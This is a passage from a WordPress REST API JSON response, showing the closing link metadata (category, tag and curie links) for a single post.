":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=919"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=919"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}